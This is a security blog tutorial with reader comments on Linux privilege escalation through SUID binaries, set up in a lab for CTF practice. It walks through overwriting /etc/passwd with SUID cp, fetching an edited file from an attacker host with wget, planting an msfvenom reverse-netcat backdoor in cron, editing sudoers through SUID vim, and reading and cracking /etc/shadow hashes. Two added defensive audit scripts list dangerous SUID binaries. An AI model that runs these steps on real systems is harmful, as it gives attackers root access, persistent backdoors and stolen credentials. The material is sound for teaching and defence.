
Hacking Articles

Raj Chandel’s Blog

Privilege Escalation

Linux Privilege Escalation using SUID Binaries

May 16, 2018 By Raj

In our previous article we discussed “Privilege Escalation in Linux using etc/passwd file”,
and today we will learn “Privilege Escalation in Linux using SUID Permission.” While solving
CTF challenges we always check for SUID permissions on files and commands as a route to
privilege escalation, so it is important to know what SUID is, how to set it and how it helps
in privilege escalation. You can read our previous articles where we applied this trick for
privilege escalation. Open the links given below:

Link 1: Hack the Box Challenge: Bank Walkthrough

Link 2: Hack the Box Challenge: Haircut Walkthrough

Let’s start with the theoretical concept!

As we all know, in Linux everything is a file, including directories and devices, and every file
has permissions that allow or restrict three operations: read, write and execute. So when you set
permissions on a file, you should be aware of which Linux users you are allowing or restricting
for each of the three operations. Take a look at the following image.

Hence it is clear that the maximum value used to set permissions for each user class is 7,
which is the sum of read (4), write (2) and execute (1). For example, if you set chmod 755,
the permissions will appear as rwxr-xr-x.

But when a special permission bit is added, it becomes SUID, SGID or the sticky bit. When the
extra bit “4” is set for the user (owner) it becomes SUID (Set User ID), when bit “2” is set for
the group it becomes SGID (Set Group ID), and the sticky bit “1” is set on a directory in which
other users are allowed to create files, so that each user can delete only their own files.

What is SUID Permission?

SUID (Set User ID) is a type of permission that allows users to execute a file with the
permissions of the file’s owner rather than their own. Files that have the SUID bit set therefore
run with higher privileges when their owner is privileged. Assume we are accessing the target
system as a non-root user and we find root-owned binaries with the SUID bit enabled: those
files/programs/commands will run with root privileges.

How to set SUID?

Basically, you can change the permissions of any file using either the “numerical” method
(chmod 4755) or the “symbolic” method (chmod u+s). As a result, the x in the owner’s
permissions is replaced by an s, as shown in the image below, which denotes special execute
permission with the higher privilege for that particular file/command. Since we are enabling
SUID for the owner (user), bit 4 or the symbol s is added in front of the read/write/execute
bits.

If you run ls -al on the file and see the lowercase ‘s’ in the owner’s execute position, as in the
image above, it means the SUID bit is enabled for that file and, when the owner is root, it is
executed with root privileges. (A capital ‘S’ means the SUID bit is set but the owner has no
execute permission, so it has no effect.)

How to Find SUID Files

By using the following command you can enumerate all binaries having SUID permissions:

find / -perm -u=s -type f 2>/dev/null

/ denotes start from the top (root) of the file system and descend into every directory
-perm denotes search for the permissions that follow
-u=s denotes look for files that have the SUID bit set in the owner (user) permissions; it is equivalent to -perm -4000
-type states the type of file we are looking for
f denotes a regular file, not directories or special files
2 denotes the second file descriptor of the process, i.e. stderr (standard error)
> means redirection
/dev/null is a special filesystem object that throws away everything written to it, so “permission denied” errors are hidden
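As an added example that is not part of the original article, the following POSIX sh audit takes the output of the find command above and sorts each SUID file into a baseline allowlist, a list of known file-copying or shell-spawning tools, or unknown. The allowlist and the dangerous-names list are assumptions for illustration and should be tuned against the package manager's records on the host.

```shell
#!/bin/sh
# Added example, not from the original article: classify the paths printed by
#   find / -perm -u=s -type f 2>/dev/null     (equivalent: find / -perm -4000 -type f)
# so a defender can spot SUID binaries that should not be there.

# Binaries that normally carry SUID on Debian-style systems (assumed baseline;
# confirm against your distribution's package metadata before relying on it).
BASELINE="/usr/bin/passwd /usr/bin/sudo /usr/bin/su /bin/su /bin/mount /bin/umount /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd"
# Programs the article shows being abused when SUID: they copy, edit or execute
# arbitrary things, so a SUID copy is an immediate root path.
DANGEROUS="cp find vim vim.basic nano bash sh python python2.7 cat less more nmap"

# in_list NEEDLE "LIST": succeed if NEEDLE is one of the whitespace-separated words.
in_list() {
    for item in $2; do
        [ "$item" = "$1" ] && return 0
    done
    return 1
}

# classify_suid PATH: print baseline, dangerous or unknown.
classify_suid() {
    if in_list "$1" "$BASELINE"; then echo baseline
    elif in_list "$(basename "$1")" "$DANGEROUS"; then echo dangerous
    else echo unknown
    fi
}

# audit_suid_list: read one path per line on stdin, print "CLASS PATH" for every
# non-baseline entry, and return 1 if at least one dangerous binary was seen.
audit_suid_list() {
    rc=0
    while IFS= read -r path; do
        [ -z "$path" ] && continue
        class=$(classify_suid "$path")
        [ "$class" = baseline ] && continue
        [ "$class" = dangerous ] && rc=1
        echo "$class $path"
    done
    return $rc
}

# Constructed sample listing mirroring the article's lab, not a real host.
SAMPLE_SUID='/usr/bin/passwd
/usr/bin/sudo
/bin/cp
/usr/bin/vim.basic
/bin/rootshell/shell
/usr/bin/find'

# count_flagged: number of non-baseline entries in the sample (4 here).
count_flagged() { printf '%s\n' "$SAMPLE_SUID" | audit_suid_list | wc -l | tr -d ' '; }

# Stand-alone run: list findings and warn if anything dangerous was found.
printf '%s\n' "$SAMPLE_SUID" | audit_suid_list || echo "WARNING: dangerous SUID binaries present"
```

On a real host, pipe the find command's output into audit_suid_list and treat every "dangerous" or "unknown" line as something to explain or remove.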

How does SUID help in privilege escalation?

In Linux, some of the existing binaries and commands can be used by non-root users to
escalate to root privileges if the SUID bit is enabled on them. Some well-known Linux/Unix
executables that can allow privilege escalation are Bash, cat, cp, echo, find, less, more,
nano, Nmap, Vim, etc.

See more here: //gtfobins.github.io/#+sudo

Let’s get into the practical work. First, create a user that is not a member of the sudo group.
Here we have added the user “ignite”, whose UID is 1001 and GID is 1001, so ignite is a
non-root user.

adduser ignite

Privilege Escalation using the copy command

If the SUID bit is enabled for the cp command, which is used to copy data, it can lead to
privilege escalation and root access.

For example, suppose you (the system admin) want to give the cp command SUID permission.
You can follow the steps below to identify its location and current permissions, after which
you can enable the SUID bit by changing the permissions.

which cp
ls -al /bin/cp
chmod u+s /bin/cp

1st Method

On the other side, start your attacking machine, first compromise the target system and then
move to the privilege escalation phase. Suppose I successfully log into the victim’s machine via
SSH and get a non-root user shell. Then, using the following command, you can list all binaries
with SUID permission.

find / -perm -u=s -type f 2>/dev/null

In the above image you can observe that it shows many files, but we are interested in /bin/cp,
because now we can copy the /etc/passwd file to read the user list. Therefore I copy the
passwd file into the HTML directory.

cp /etc/passwd /var/www/html

Meanwhile, we have generated a password hash for the new password pass123 using openssl
passwd.

We have copied the passwd file into the web directory, i.e. /var/www/html, so I can open it
through the web browser, copy the entire contents of the passwd file into a text file and then
add our own user with root UID, GID and home directory.

In our previous article we already discussed how to add a user to /etc/passwd using the
OpenSSL passwd utility.

Run a Python HTTP server to transfer our edited passwd file to the target machine.

python -m SimpleHTTPServer 80

As we all know, the /tmp directory allows any user to create or delete files, so we download
our passwd file there. After it is downloaded, we copy /tmp/passwd over /etc/passwd; because
cp is SUID root, this overwrites the original passwd file.

cd /tmp
wget //192.168.1.108/passwd
cp passwd /etc/passwd

With the help of the tail command we confirmed that our user “hack” is now part of the
/etc/passwd file. Since we have added our own user with root privileges, let’s switch to it and
check.

su hack
whoami

And Yessssssss!! This is an incredible way to escalate to root privileges.
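As an added example that is not part of the original article, the following POSIX sh check detects the tampering this method (and the nano method later in the post) performs on /etc/passwd: a second UID 0 account, and a password hash stored in the passwd file itself instead of in /etc/shadow. The sample passwd content is constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original article: detect the tampering performed
# above, where a new UID 0 account with its password hash placed directly in
# /etc/passwd is written over the real file. The sample file is constructed;
# pass a real path (normally /etc/passwd) to audit a host.

# check_passwd FILE: print one finding per line; return 1 if any finding.
check_passwd() {
    awk -F: '
        NF != 7 {
            printf "malformed entry at line %d: %s\n", NR, $0; bad = 1; next
        }
        $3 == 0 && $1 != "root" {
            printf "extra UID 0 account: %s\n", $1; bad = 1
        }
        $2 != "x" && $2 != "*" && $2 != "!" {
            # a hash (or nothing) here bypasses the /etc/shadow protections
            printf "non-shadow password field for %s\n", $1; bad = 1
        }
        END { exit bad ? 1 : 0 }
    ' "$1"
}

# Constructed sample: the "hack" entry mirrors what the walkthrough adds.
SAMPLE_PASSWD=$(mktemp)
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ignite:x:1001:1001:,,,:/home/ignite:/bin/bash
hack:$1$constructed$notarealhash:0:0:root:/root:/bin/bash
EOF

# A clean file (first three entries only) for comparison.
CLEAN_PASSWD=$(mktemp)
head -n 3 "$SAMPLE_PASSWD" > "$CLEAN_PASSWD"
trap 'rm -f "$SAMPLE_PASSWD" "$CLEAN_PASSWD"' EXIT

# count_findings FILE: number of lines check_passwd reports (2 for the sample).
count_findings() { check_passwd "$1" | wc -l | tr -d ' '; }

# Stand-alone run: show findings for the tampered sample.
check_passwd "$SAMPLE_PASSWD" || echo "passwd integrity check FAILED"
```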

2nd Method

Similarly, if the SUID bit is enabled for the cp command, we can also transfer our backdoor to
the target system. Here we have generated a netcat reverse-connection backdoor using the
msfvenom command.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.108 lport=1234 R

Then copy the highlighted code above, paste it into a text file with #!/bin/bash as the first line,
and it is ready to transfer to the target system. I saved it as raj.sh.

Now, we are all aware that the Linux cron utility runs the scripts in its hourly, daily, weekly and
monthly directories, so I copied raj.sh into /etc/cron.hourly so that it runs within the hour.

cp raj.sh /etc/cron.hourly/
ls -al /etc/cron.hourly/

Meanwhile we started a netcat listener in a new terminal, and once the hour had passed it
received a reverse connection from the target system with root privileges.

Hence we saw how a single cp command can lead to privilege escalation if its SUID bit is on.
You can try your own ways to escalate to root privileges using the cp command.

Privilege Escalation Using Find Command

Similarly, we can escalate to root privileges if the SUID bit is on for /usr/bin/find.

For example, suppose you (the system admin) want to give SUID permission to the find
command. You can use the which command to identify its location and current permissions,
after which you can enable the SUID bit by changing the permissions.

which find
ls -al /usr/bin/find
chmod u+s /usr/bin/find

Again compromise the target system and then move to the privilege escalation phase as done
above. Then, using the following command, you can enumerate all binaries having SUID
permission.

find / -perm -u=s -type f 2>/dev/null

So here we learn that the SUID bit is enabled for the find command, which means we can
execute any command within find. To do so, we first create an empty file “raj” and then run
the whoami command through find as shown below.

touch raj
find raj -exec "whoami" \;

If an attacker finds the SUID bit set on /usr/bin/find, it allows him to execute any malicious
command, such as launching a netcat or /bin/bash shell, or to fetch important system
information for privilege escalation.

Privilege Escalation Using Vim editor

Similarly, we can escalate to root privileges if the SUID bit is on for the Vim editor. For
example, suppose you (the system admin) want to give SUID permission to the Vim editor. You
can use the “which” command to identify its location and current permissions, after which you
can enable the SUID bit by changing the permissions.

which vim
ls -al /usr/bin/vim
ls -al /etc/alternatives/vim
chmod u+s /usr/bin/vim.basic

You will find that /usr/bin/vim is a symlink that resolves to vim.basic, as shown in the image below.

Again compromise the target system and then move to the privilege escalation phase as done
above. Then, using the following command, you can enumerate all binaries having SUID
permission.

find / -perm -u=s -type f 2>/dev/null

So here we learn that the SUID bit is enabled for /usr/bin/vim.basic, and hence we can now
use vim to edit any file that is normally editable only by sudo or root users.

As we know, ignite is a non-root user with the least permissions, but since vim has SUID
permission we can edit the sudoers file through it and change the permissions for user “ignite”.

So we open the sudoers file by typing the visudo command and give all permissions to user
“ignite”, as shown in the image.

ignite ALL=(ALL:ALL) ALL

Now let’s gain root access as shown in the image below.

sudo -l
sudo bash
id

Great!! This trick also works superbly for privilege escalation.

Privilege Escalation using Saved Script

There is a good chance of finding some kind of script or program on the system; it can be any
script, whether PHP, Python or C. Suppose you (the system admin) want to give SUID
permission to a C program that provides a bash shell on execution.

So here we have coded a C program that calls system() to launch a bash shell and saved it as
“asroot.c”.

Then create a rootshell directory inside /bin, copy asroot.c into it and run the gcc compiler to
compile it.

mkdir /bin/rootshell
cd /bin/rootshell
cp /home/raj/Desktop/asroot.c .
ls
gcc asroot.c -o shell
chmod u+s shell
ls -al shell

Now again compromise the target system and use the find command to identify binaries having
SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we learn that the SUID bit is enabled for many binaries, but we are interested in
/bin/rootshell/shell. So we move into the /bin/rootshell directory and run the “shell” binary;
as a result we get root access, as shown below.

cd /bin/rootshell
./shell
id

Hence we saw how we can escalate to root privileges if the SUID bit is enabled for any such
program. Although it is unlikely to find a program that directly calls a bash shell, if you find
any script with SUID permission you can use the techniques above to modify its contents to get
a bash shell.

Privilege Escalation using Nano Editor

Similarly, we can escalate to root privileges if the SUID bit is on for the nano editor. For
example, suppose you (the system admin) want to give SUID permission to the nano editor. You
can follow the steps below to identify its location and current permissions so that you can
enable the SUID bit by changing the permissions.

which nano
ls -al /bin/nano
chmod u+s /bin/nano

Again compromise the target system and then move to the privilege escalation phase as done
above. Then, using the following command, you can enumerate all binaries having SUID
permission.

find / -perm -u=s -type f 2>/dev/null

So here we learn that the SUID bit is enabled for /bin/nano, so now let’s open the /etc/passwd
file to add our own user as done above using OpenSSL passwd.

Meanwhile, I have generated a password hash for the new password 123 using openssl passwd.

Now open the passwd file with the nano editor and add your own user as done above. Here you
can observe that I have created a demo user with a password hash in the victim’s system.

nano /etc/passwd

Since we have added our own user with root privileges, let’s switch to it and check.

su demo
id

2nd Method

If the SUID bit is enabled for /bin/nano then we can also steal the password hashes from the
/etc/shadow file. So after compromising the target machine we opened the shadow file in the
nano editor and copied the password hash set for user raj.

Now paste the copied hash into a text file, save it as “hash” on the desktop, and then use John
the Ripper to crack it as shown below. It reported raj:123 as the password; now try to log into
the target system through the raj account.

So today we have demonstrated how the SUID permission can lead to privilege escalation even
when it is granted to ordinary commands and programs such as cp, cat, nano and vim.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information
Security Consultant, and a lover of Social Media and Gadgets. Contact here

11 thoughts on “Linux Privilege Escalation using SUID Binaries”

Afonso Alves
May 19, 2018 at 7:13 pm

Thanks for all your work!

This is well-done research!

Reply

Mani
March 14, 2019 at 5:03 am

Thank you for this article.

You described all possible scenarios for Privilege Escalation, but I would like to know
how a user can do Privilege Escalation using a bash file whose content is
“/bin/bash”?
Thank you

Reply

n0p3ntm3
December 14, 2020 at 7:10 am

If “/bin/bash” has SUID set, the user can execute “bash -p” and this should allow you
to run bash as root. Please correct me if I am wrong.

Cheers!

Reply

BlaCkDicE
April 22, 2021 at 11:14 pm

Thanks Bro.

Your tip about -p helped me to get root on a system!

Reply

hasan ates
June 13, 2019 at 5:06 pm

If you allow me, I would like to translate this post into Turkish and post it on my
blog website. Is this OK???

Reply

Raj Chandel 
June 14, 2019 at 4:29 pm

OK, no problem

Reply

Prateek sehitia
August 10, 2019 at 6:59 am

I found one problem: even when you can copy the passwd file, when you try to move it
to /etc/passwd an error will occur, because most of the time it is rwxr--r--.
Please suggest some other alternative.

Reply

rafael
October 12, 2019 at 2:14 am

Same problem... please, can you explain that part??

thank you!!!

Reply

Sandeep Yadav
February 24, 2021 at 10:09 am

Sir, please make a book of the Privilege Escalation cheat sheet, please sir.

Reply

klokla
May 11, 2021 at 4:19 am

When I set SUID on /usr/bin/python2.7,

but there is no privilege escalation with python2.7???
python -c 'import os; os.system("/bin/sh")'

Reply

Jeremiah
July 20, 2021 at 5:24 pm

Wow! Good notes

Reply
